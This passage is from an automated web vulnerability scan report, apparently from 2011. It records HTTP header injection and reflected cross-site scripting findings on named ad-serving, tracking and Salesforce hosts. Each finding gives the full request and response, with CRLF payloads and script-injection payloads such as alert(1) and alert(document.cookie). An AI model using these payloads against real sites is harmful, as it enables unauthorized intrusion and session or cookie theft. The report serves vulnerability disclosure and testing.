Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: u2=152b62bf-e208-4574-99e3-64f5d04be4b73Gz050; expires=Sat, 07-May-2011 08:22:02 GMT; domain=.serving-sys.com; path=/
Set-Cookie: eyeblaster=BWVal=c3e38
ea51dd9334e
&BWDate=40580.348634&debuglevel=&FLV=10.1103&RES=128&WMPV=0; expires=Sat, 07-May-2011 08: 22:02 GMT; domain=bs.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Sun, 06 Feb 2011 13:22:01 GMT
Connection: close
Content-Length: 0


3.22. http://bs.serving-sys.com/BurstingPipe/adServer.bs [eyeblaster cookie]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Issue detail

The value of the eyeblaster cookie is copied into the Set-Cookie response header. The payload b9a93%0d%0afca8ffe0901 was submitted in the eyeblaster cookie. This caused a response containing an injected HTTP header.

Request

GET /BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2117121&PluID=0&e=0&w=728&h=90&ord=7582024&ncu=$$http://ad.doubleclick.net/click%3Bh%3Dv8/3aa6/3/0/%2a/m%3B235470018%3B0-0%3B0%3B23542470%3B3454-728/90%3B40150909/40168696/1%3Bu%3Dzdtopic%3Ditmanagement|zdtopic%3Denterprise|zdtopic%3Dintelligence|zdid%3Da6280|zdtype%3Darticle|zdaudience%3D|zdproduct%3D|zdcompany%3D|zdpagetype%3D%3B%7Eaopt%3D2/0/73/0%3B%7Esscs%3D%3f$$ HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://www.baselinemag.com/c/a/IT-Management/Macys-Ramps-Up-Online-Operations-637464/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u3=1; C4=; ActivityInfo=000p81bCx%5f; eyeblaster=BWVal=408&BWDate=40573.510532&debuglevel=&FLV=10.1103&RES=128&WMPV=0b9a93%0d%0afca8ffe0901; A3=f+JvabEk02WG00002h5iUabNz07l00000Qh5j3abNz07l00000.gYyfadw90cvM00001gn3Ka4JO09MY00001gNfHaaiN0aVX00001fU+La50V0a+r00001gL2MadKj0bdR00001gKXMaepH0bdR00001h802ae7k0c6L00001fUFGa50V02WG00001gYx+adw90cvM00001gKXNaepP0bdR00001gy3.ach00c9M00001cRreabeg03Dk00001heXiaeru0c9M00001gy7La9bU0c9M00003gy5Da9bU0c9M00001gCTVa9bU0c9M00001gvKEacgY0c9M00001ge4Gack+0bM000001ge4Hack+0bM000001gNQ4ae7r0c9M00001; B3=7lgH0000000001sG89PS000000000QsZ89PT000000000.sZ8mb20000000001t48i440000000001t28bwx0000000001t482790000000002t5852G0000000003sS8qav0000000001t57dNH0000000002sZ7GHq0000000001s.7FCH0000000001s.83xP0000000001sF8cVQ0000000001sV82980000000001t3852N0000000001s.87ma0000000001s.6o.Q0000000001sY7gi30000000001sG8i430000000001t2852z0000000001sS852A0000000001sS; u2=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G601g

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: eyeblaster=BWVal=408&BWDate=40573.510532&debuglevel=&FLV=10.1103&RES=128&WMPV=0b9a93
fca8ffe0901
; expires=Sat, 07-May-2011 08: 21:37 GMT; domain=bs.serving-sys.com; path=/
Set-Cookie: A3=gLnTaeKR09sO00001h5j3abNz07l00000.h5iUabNz07l00000Qf+JvabEk02WG00002gNfHaaiN0aVX00001gn3Ka4JO09MY00001gYyfadw90cvM00001gL2MadKj0bdR00001fU+La50V0a+r00001h802ae7k0c6L00001gKXMaepH0bdR00001gKXNaepP0bdR00001gYx+adw90cvM00001fUFGa50V02WG00001gy3.ach00c9M00001cRreabeg03Dk00001heXiaeru0c9M00001gy7La9bU0c9M00003gCTVa9bU0c9M00001gy5Da9bU0c9M00001gvKEacgY0c9M00001ge4Gack+0bM000001gNQ4ae7r0c9M00001ge4Hack+0bM000001; expires=Sat, 07-May-2011 08:21:37 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B3=89PS000000000QsZ7lgH0000000001sG89PT000000000.sZ8bwx0000000001t48i440000000001t28mb20000000001t4852G0000000003sS82790000000002t57dNH0000000002sZ8qav0000000001t57GHq0000000001s.7FCH0000000001s.8cVQ0000000001sV83xP0000000001sF82980000000001t384U10000000001t6852N0000000001s.6o.Q0000000001sY87ma0000000001s.8i430000000001t27gi30000000001sG852z0000000001sS852A0000000001sS; expires=Sat, 07-May-2011 08:21:37 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u2=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G601g; expires=Sat, 07-May-2011 08:21:37 GMT; domain=.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Sun, 06 Feb 2011 13:21:37 GMT
Connection: close
Content-Length: 2841

var ebPtcl="http://";var ebBigS="ds.serving-sys.com/BurstingCachedScripts/";var ebResourcePath="ds.serving-sys.com/BurstingRes//";var ebRand=new String(Math.random());ebRand=ebRand.substr(ebRand.index
...[SNIP]...

3.23. http://bs.serving-sys.com/BurstingPipe/adServer.bs [flv parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Issue detail

The value of the flv request parameter is copied into the Set-Cookie response header. The payload 131a5%0d%0ad2c2e010a34 was submitted in the flv parameter. This caused a response containing an injected HTTP header.

Request

GET /BurstingPipe/adServer.bs?cn=int&iv=2&int=4388343~~0~~~^ebBelowTheFold~0~0~01020&OptOut=0&ebRandom=0.06774244247935712&flv=131a5%0d%0ad2c2e010a34&wmpv=0&res=128 HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://www.baselinemag.com/c/a/IT-Management/Macys-Ramps-Up-Online-Operations-637464/
Origin: http://www.baselinemag.com
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: u2=b7b7b2ef-33ea-42bf-9135-a5d225ccd4143Gz050; expires=Sat, 07-May-2011 08:21:34 GMT; domain=.serving-sys.com; path=/
Set-Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=131a5
d2c2e010a34
&RES=128&WMPV=0; expires=Sat, 07-May-2011 08: 21:34 GMT; domain=bs.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Sun, 06 Feb 2011 13:21:33 GMT
Connection: close
Content-Length: 0


3.24. http://bs.serving-sys.com/BurstingPipe/adServer.bs [res parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Issue detail

The value of the res request parameter is copied into the Set-Cookie response header. The payload 46baf%0d%0a393469f66ab was submitted in the res parameter. This caused a response containing an injected HTTP header.

Request

GET /BurstingPipe/adServer.bs?cn=int&iv=2&int=4388343~~0~~~^ebBelowTheFold~0~0~01020&OptOut=0&ebRandom=0.06774244247935712&flv=10.1103&wmpv=0&res=46baf%0d%0a393469f66ab HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://www.baselinemag.com/c/a/IT-Management/Macys-Ramps-Up-Online-Operations-637464/
Origin: http://www.baselinemag.com
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: u2=76ac510f-28bb-4b8e-bda1-5dd09b3e46db3Gz070; expires=Sat, 07-May-2011 08:21:35 GMT; domain=.serving-sys.com; path=/
Set-Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=46baf
393469f66ab
&WMPV=0; expires=Sat, 07-May-2011 08: 21:35 GMT; domain=bs.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Sun, 06 Feb 2011 13:21:34 GMT
Connection: close
Content-Length: 0


3.25. http://bs.serving-sys.com/BurstingPipe/adServer.bs [wmpv parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Issue detail

The value of the wmpv request parameter is copied into the Set-Cookie response header. The payload 8bddc%0d%0a1cb899d5230 was submitted in the wmpv parameter. This caused a response containing an injected HTTP header.

Request

GET /BurstingPipe/adServer.bs?cn=int&iv=2&int=4388343~~0~~~^ebBelowTheFold~0~0~01020&OptOut=0&ebRandom=0.06774244247935712&flv=10.1103&wmpv=8bddc%0d%0a1cb899d5230&res=128 HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://www.baselinemag.com/c/a/IT-Management/Macys-Ramps-Up-Online-Operations-637464/
Origin: http://www.baselinemag.com
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: u2=57a20fa3-e884-41e5-a038-fc8ea0d310073Gz050; expires=Sat, 07-May-2011 08:21:35 GMT; domain=.serving-sys.com; path=/
Set-Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=8bddc
1cb899d5230
; expires=Sat, 07-May-2011 08: 21:35 GMT; domain=bs.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Sun, 06 Feb 2011 13:21:35 GMT
Connection: close
Content-Length: 0


3.26. http://live.activeconversion.com/webtracker/track2.html [avc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://live.activeconversion.com
Path:   /webtracker/track2.html

Issue detail

The value of the avc request parameter is copied into the Set-Cookie response header. The payload 2106c%0d%0aeb95574723e was submitted in the avc parameter. This caused a response containing an injected HTTP header.

Request

GET /webtracker/track2.html?method=track&pid=31021&uclkt=1&alh=http%3A//www.owneriq.com/ownership-targeting%3Fsrc%3D728x90_blue&avc=2106c%0d%0aeb95574723e&source=&keyword=&ref=http%3A//homeappliance.manualsonline.com/ex/mfg/headline/m/ariens47888%252527%25253balert%252528document.cookie%252529%25252f%25252f8fcf167d281/d/type/product_problem&pageTitle=Ownership%20Targeting%20%7C%20OwnerIQ&pageUrl=http%3A%2F%2Fwww.owneriq.com%2Fownership-targeting%3Fsrc%3D728x90_blue&java=1&amcs=0.41058127977885306 HTTP/1.1
Host: live.activeconversion.com
Proxy-Connection: keep-alive
Referer: http://www.owneriq.com/ownership-targeting?src=728x90_blue
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 22:35:44 GMT
Server: Apache
Pragma: no-cache
Cache-Control: no-store, no-cache, max-age=0, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=C1524BDBD48BB3A5968A32D0C1902338; Path=/webtracker
Set-Cookie: _wt_31021="1296945354839|2106c
eb95574723e
|0"; Max-Age=630720000;Path=/; HttpOnly
P3P: policyref="http://www.activeconversion.com/w3c/p3p.xml", CP="NOI DSP LAW PSA OUR IND STA NAV COM"
Connection: close
Content-Type: image/png
Content-Length: 68

.PNG
.
...IHDR.....................IDATx.c`...............IEND.B`.

3.27. http://mm.chitika.net/track [target parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mm.chitika.net
Path:   /track

Issue detail

The value of the target request parameter is copied into the Location response header. The payload 7ddb9%0d%0ad1e8da5d420 was submitted in the target parameter. This caused a response containing an injected HTTP header.

Request

GET /track?target=7ddb9%0d%0ad1e8da5d420&xargs=1Owx8oFMt4m2YkqUMiPXwDnPUhRRY7ZEJ9LJTWSrnbZhgBfErhtcKKOiM6mjHeLYQPOhFTlgMiQNUi0Wzinee2B3WGL1cDC9iHCONuiA3%2FJLEbd3x%2FFU5i2%2FejQpwMx5yyDTjsWiUUsISHcBq5Cyt5RwSg5CKdbMkrYy9xwqz2dX1VJJLhn25UnM9r3EOr3kRAA7PYs93YlDtwLI5JLm3nWA7dYYrFPozVln3uSAGFgS4lCNg3xHbrApZyDMytFV2l2C7ULWrmQ1l9bzagD%2FAT68Pby1uNFEA22B%2FM90suzy%2FYjy3MzE23bVmK7lC9jUeyBWeaoqNWxXGRluKS44nJO34%2BrioOQV%2FxSJ%2By45Fo8X%2FyWC5WegF0dVp6w1Bt2lFzVLgvn19KwnF%2BFWR4G6ZhENP1sKJJ8ayL0Tdvc1we8TPqrcCxAlGk5VR%2F94hQcEKqe6WwkOm3ytJOOEop9VFSJq%2FtFSYoywNhWzr%2BIMaHWBqkqSde8xNIVIc5X5QSFeoSqyFJwnv8A%3D&template=v1-450xauto\ HTTP/1.1
Host: mm.chitika.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _cc=G/SkJiIEkgB5jwthOgp2U7fj6wwhdgvL4c0tN7QIkjl+9DY+kxm0FYEPwYHEtzd1Eb9GVhAFySrB7FsCah5yekHnHk86QdWmqzPlPoX9fVgKhjoJ7H0CpjFT5Hp1o2UMeStsZFPsF38vogWeCxRsANnVfye1gm5VQVRitA3zocW7G6iOKSNpC8nW/fSMYPkd+FCgRcmr74lmkl5cwzW3Czwl6LeM3oQBJIYcJ6NbVb7AFAn8X+k1IsMDj5bEGLsE44aH3XGVfZEeq7YK0yCm1xoznT+oB6MyoGrFo+3L+n46HJMn/fIuhcbGfmpCGIWgP/8azfwodcqzdnmXzDHV02SLzkuIP4TROEiHhvvFYJCve1mdj9NNH2b6m71cRkwsP7WlTZEvF7RLkkrfjucSwCzhr5Z1qjMilr/trLois3rxw1y+NdQfz3XqMUHrYIFc6GSu7GKj22sCBmPetmAel7epjXByEoA7.VuO7eR5Qy1Z0VmN7sMLZzA.4;

Response

HTTP/1.1 302 Found
Date: Sat, 05 Feb 2011 22:58:25 GMT
Server: Apache
P3P: policyref="http://scripts.chitika.net/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: _cc=G/SkJSQEuhBljgvx6LisqP2AupJFgK5WemUmSqCRZBWwtlJoLJyYgB+x08rWfR/ShFOalNGTqfmziVraghl7E5uw5btOx1dW574W9FJdg9xGu8SZOgKpaXrz/KeWcoywhRG4MQwBrjR5HTBMUxakdzesJAd4Nllx/eIueA718dgTuI7OkPWLq5kZjUJi1hH8BvBRmtvD9sSaTkItOkMvQBn5y8eB2Gp0MskIHLnRFrJebU/IavRUXhAPea4WfMxpEOwV9DXMgU85wESeHUWmEzFegExxv1n4K/i4nOYKeA6L8d0eyjYfz8uXn3ThKSqF9Iq/lRa8qtkQAJ7UE7txh/8Q3dkebSqNOlEMRNgiDUcLqxp3a5iHCGn6SzZvUvsa4JchhEu05jAodlusGhdyDYZ2FHyz9ji7Dr9CcBp9CFsi6xzuPykQkPYHuRmbnXGF33GtvsL21BOvdvWactKWHYZJoFq3keAnHZZ5ScLOxGWr1lc2oUiObTE5Mitwsa52DBLd/xZxi39hOQ==.cEUs/P3Fg8JIxIN0nB7icA.4; path=/; domain=.chitika.net; expires=Sun, 05-Feb-2012 22:58:25 GMT
Location: 7ddb9
d1e8da5d420

Content-Length: 202
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="7ddb9
d1e8da5d420">here</a>.</p>
</body></html
...[SNIP]...

3.28. http://www.salesforce.com/servlet/servlet.WebToLead [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.salesforce.com
Path:   /servlet/servlet.WebToLead

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 7d788%0d%0a7be81555d22 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /servlet/7d788%0d%0a7be81555d22 HTTP/1.1
Host: www.salesforce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Server: SFDC
Location: /servlet/7d788
7be81555d22
/
Date: Sat, 05 Feb 2011 22:09:45 GMT
Connection: close
Content-Length: 93

The URL has moved to <a href="/servlet/7d788
7be81555d22/">/servlet/7d788
7be81555d22/</a>

3.29. https://www.salesforce.com/servlet/servlet.WebToLead [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.salesforce.com
Path:   /servlet/servlet.WebToLead

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 1b8d9%0d%0af0e07ef42ca was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /servlet/1b8d9%0d%0af0e07ef42ca HTTP/1.1
Host: www.salesforce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Server: SFDC
Location: /servlet/1b8d9
f0e07ef42ca
/
Date: Sat, 05 Feb 2011 22:10:03 GMT
Connection: close
Content-Length: 93

The URL has moved to <a href="/servlet/1b8d9
f0e07ef42ca/">/servlet/1b8d9
f0e07ef42ca/</a>

4. Cross-site scripting (reflected)  previous  next
There are 700 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


4.1. http://a.ligatus.com/timeout.php [ids parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.ligatus.com
Path:   /timeout.php

Issue detail

The value of the ids request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d8918"><script>alert(1)</script>cc16b0d36e8 was submitted in the ids parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /timeout.php?ids=9470d8918"><script>alert(1)</script>cc16b0d36e8 HTTP/1.1
Host: a.ligatus.com
Proxy-Connection: keep-alive
Referer: http://www.mittelstandsblog.de/?d18cb%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E02e0a7e96b=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 17:44:28 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html
Accept-Ranges: bytes
Cache-Control: private, max-age=600
Age: 0
Expires: Sun, 06 Feb 2011 17:54:28 GMT
Connection: Keep-Alive
Content-Length: 116

<script src="http://e.ligatus.com/LigatusFallback.gif?ids=9470d8918"><script>alert(1)</script>cc16b0d36e8"></script>

4.2. http://a.ligatus.com/timeout.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.ligatus.com
Path:   /timeout.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3b3a4"><script>alert(1)</script>eb71085dfca was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /timeout.php?ids=/3b3a4"><script>alert(1)</script>eb71085dfca9470 HTTP/1.1
Host: a.ligatus.com
Proxy-Connection: keep-alive
Referer: http://www.mittelstandsblog.de/?d18cb%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E02e0a7e96b=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 17:45:05 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html
Accept-Ranges: bytes
Cache-Control: private, max-age=600
Age: 0
Expires: Sun, 06 Feb 2011 17:55:05 GMT
Connection: Keep-Alive
Content-Length: 117

<script src="http://e.ligatus.com/LigatusFallback.gif?ids=/3b3a4"><script>alert(1)</script>eb71085dfca9470"></script>

4.3. http://ad-emea.doubleclick.net/adj/N1120.Mittelstandswiki/B5089496 [adurl parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad-emea.doubleclick.net
Path:   /adj/N1120.Mittelstandswiki/B5089496

Issue detail

The value of the adurl request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f6a0e"-alert(1)-"872292d8e2e was submitted in the adurl parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N1120.Mittelstandswiki/B5089496;sz=336x280;click=http://adclick.g.doubleclick.net/aclk?sa=l&ai=B9MZ-29VOTYi_OZztlQfnzZ2uCtb3kP4BAAAAEAEgADgAWOag4YweYMmGo4fUo4AQggEXY2EtcHViLTUxMjE2OTA0MjEzMzc1MDayARd3d3cubWl0dGVsc3RhbmRzYmxvZy5kZboBCjMwMHgyNTBfYXPIAQnaAWZodHRwOi8vd3d3Lm1pdHRlbHN0YW5kc2Jsb2cuZGUvP2QxOGNiJTIyJTNFJTNDc2NyaXB0JTNFYWxlcnQoZG9jdW1lbnQuY29va2llKSUzQy9zY3JpcHQlM0UwMmUwYTdlOTZiPTHgAQKpAm2G3Iu2yrY-wAIC4AIA6gIJNjUxNC9taXdp-AL40R6QA6QDmAOMBqgDAdAEkE7gBAE&num=0&sig=AGiWqty8E627muEmQx3YhDjMnFTKuJGFpw&client=ca-pub-5121690421337506&adurl=f6a0e"-alert(1)-"872292d8e2e HTTP/1.1
Host: ad-emea.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.mittelstandsblog.de/?d18cb%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E02e0a7e96b=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 7905
Cache-Control: no-cache
Pragma: no-cache
Date: Sun, 06 Feb 2011 17:47:22 GMT
Expires: Sun, 06 Feb 2011 17:47:22 GMT

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Mon Jan 17 10:59:03 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
nQuY29va2llKSUzQy9zY3JpcHQlM0UwMmUwYTdlOTZiPTHgAQKpAm2G3Iu2yrY-wAIC4AIA6gIJNjUxNC9taXdp-AL40R6QA6QDmAOMBqgDAdAEkE7gBAE&num=0&sig=AGiWqty8E627muEmQx3YhDjMnFTKuJGFpw&client=ca-pub-5121690421337506&adurl=f6a0e"-alert(1)-"872292d8e2ehttp://www.ibm.com/innovation/de/systemx/intel?cmp=100K3&ct=100K303A&cr=Mittelstandswiki_Rotation&cm=B&csr=neiotde_mm_intel-q12011&ccy=DE&cd=2011-01-06&cn=q1_mm_off_systemxintel_fla_336x280_de&csz=336x
...[SNIP]...

4.4. http://ad-emea.doubleclick.net/adj/N1120.Mittelstandswiki/B5089496 [adurl parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad-emea.doubleclick.net
Path:   /adj/N1120.Mittelstandswiki/B5089496

Issue detail

The value of the adurl request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7a2e8'-alert(1)-'f747d321270 was submitted in the adurl parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N1120.Mittelstandswiki/B5089496;sz=336x280;click=http://adclick.g.doubleclick.net/aclk?sa=l&ai=B9MZ-29VOTYi_OZztlQfnzZ2uCtb3kP4BAAAAEAEgADgAWOag4YweYMmGo4fUo4AQggEXY2EtcHViLTUxMjE2OTA0MjEzMzc1MDayARd3d3cubWl0dGVsc3RhbmRzYmxvZy5kZboBCjMwMHgyNTBfYXPIAQnaAWZodHRwOi8vd3d3Lm1pdHRlbHN0YW5kc2Jsb2cuZGUvP2QxOGNiJTIyJTNFJTNDc2NyaXB0JTNFYWxlcnQoZG9jdW1lbnQuY29va2llKSUzQy9zY3JpcHQlM0UwMmUwYTdlOTZiPTHgAQKpAm2G3Iu2yrY-wAIC4AIA6gIJNjUxNC9taXdp-AL40R6QA6QDmAOMBqgDAdAEkE7gBAE&num=0&sig=AGiWqty8E627muEmQx3YhDjMnFTKuJGFpw&client=ca-pub-5121690421337506&adurl=7a2e8'-alert(1)-'f747d321270 HTTP/1.1
Host: ad-emea.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.mittelstandsblog.de/?d18cb%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E02e0a7e96b=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
